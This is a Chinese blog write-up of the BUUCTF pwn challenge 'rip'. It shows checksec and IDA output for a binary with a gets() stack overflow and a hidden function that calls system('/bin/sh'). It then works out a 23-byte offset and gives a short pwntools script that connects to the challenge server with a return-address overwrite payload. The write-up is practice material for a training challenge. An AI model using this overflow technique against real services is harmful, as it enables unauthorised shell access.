• BUUCTF-PWN爬坑-02-rip


    • 1 file
    file pwn1                                                                                                      
    pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
    • 2 checksec
    checksec pwn1 
    [*] '/home/kali/Desktop/pwn1'
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX disabled
        PIE:      No PIE


    • 3 ida F12+shift strings windows
    # 查看关键词
    Address	Length	Type	String
    LOAD:00000000004002A8	0000001C	C	/lib64/ld-linux-x86-64.so.2
    LOAD:00000000004003B9	0000000A	C	libc.so.6
    LOAD:00000000004003C3	00000005	C	gets
    LOAD:00000000004003C8	00000005	C	puts
    LOAD:00000000004003CD	00000007	C	system
    LOAD:00000000004003D4	00000012	C	__libc_start_main
    LOAD:00000000004003E6	0000000C	C	GLIBC_2.2.5
    LOAD:00000000004003F2	0000000F	C	__gmon_start__
    .rodata:0000000000402004	0000000D	C	please input
    .rodata:0000000000402011	0000000A	C	ok,bye!!!
    .rodata:000000000040201B	00000008	C	/bin/sh
    .eh_frame:00000000004020DF	00000006	C	;*3$"


    ; Attributes: bp-based frame;
    public fun
    fun proc near
    ; __unwind {
    push    rbp
    mov     rbp, rsp
    lea     rdi, command    ; "/bin/sh"
    call    _system
    pop     rbp
    ; } // starts at 401186
    fun endp
    • IDA view
    xt:0000000000401142 ; __unwind {
    .text:0000000000401142                 push    rbp
    .text:0000000000401143                 mov     rbp, rsp
    .text:0000000000401146                 sub     rsp, 10h
    .text:000000000040114A                 lea     rdi, s          ; "please input"
    .text:0000000000401151                 call    _puts
    .text:0000000000401156                 lea     rax, [rbp+s]
    .text:000000000040115A                 mov     rdi, rax
    .text:000000000040115D                 mov     eax, 0
    .text:0000000000401162                 call    _gets
    .text:0000000000401167                 lea     rax, [rbp+s]
    .text:000000000040116B                 mov     rdi, rax        ; s
    .text:000000000040116E                 call    _puts
    .text:0000000000401173                 lea     rdi, aOkBye     ; "ok,bye!!!"
    .text:000000000040117A                 call    _puts
    .text:000000000040117F                 mov     eax, 0
    .text:0000000000401184                 leave
    .text:0000000000401185                 retn
    .text:0000000000401185 ; } // starts at 401142
    .text:0000000000401185 main            endp
    .text:0000000000401186 ; =============== S U B R O U T I N E =======================================
    .text:0000000000401186 ; Attributes: bp-based frame
    .text:0000000000401186                 public fun
    .text:0000000000401186 fun             proc near
    .text:0000000000401186 ; __unwind {
    .text:0000000000401186                 push    rbp
    .text:0000000000401187                 mov     rbp, rsp
    .text:000000000040118A                 lea     rdi, command    ; "/bin/sh"
    .text:0000000000401191                 call    _system
    .text:0000000000401196                 nop
    .text:0000000000401197                 pop     rbp
    .text:0000000000401198                 retn
    .text:0000000000401198 ; } // starts at 401186
    .text:0000000000401198 fun             endp

    .text:0000000000401162 call _gets
    .text:0000000000401185 retn
    .text:0000000000401185 ; } // starts at 401142
    .text:0000000000401186 public fun

    计算偏移:1185-1162 = 23

    payload = b'A' * 23 + p64(0x401186)
    • 查看stack of main
    -0000000000000010                 db ? ; undefined
    -000000000000000F s               db ?
    -000000000000000E                 db ? ; undefined
    -000000000000000D                 db ? ; undefined
    -000000000000000C                 db ? ; undefined
    -000000000000000B                 db ? ; undefined
    -000000000000000A                 db ? ; undefined
    -0000000000000009                 db ? ; undefined
    -0000000000000008                 db ? ; undefined
    -0000000000000007                 db ? ; undefined
    -0000000000000006                 db ? ; undefined
    -0000000000000005                 db ? ; undefined
    -0000000000000004                 db ? ; undefined
    -0000000000000003                 db ? ; undefined
    -0000000000000002                 db ? ; undefined
    -0000000000000001                 db ? ; undefined
    +0000000000000000  s              db 8 dup(?)
    +0000000000000008  r              db 8 dup(?)
    +0000000000000010 ; end of stack variables

    从F至0 发现只需存入15个字节,即可覆盖至栈顶,然后加8字节可覆盖至RET,即可劫持函数返回地址

    payload = b'A' * (15+8) + p64(0x401186)


    # coding=utf-8
    from pwn import *
    port = 29566
    p = remote('node3.buuoj.cn', 29566)
    payload = b'a' * 15 + b'b'*8 + p64(0x401186)
  • 相关阅读:
    Distance Between Points
    CloseHandle(IntPtr handle)抛异常
    C# WPF 显示图片和视频显示 EmuguCv、AForge.Net测试(续)
    C# WPF 显示图片和视频显示 EmuguCv、AForge.Net测试
    Opencv不用每次创建项目配置vs2010 vc++目录 库目录等项
  • 原文地址:https://www.cnblogs.com/moke-cn/p/14242071.html
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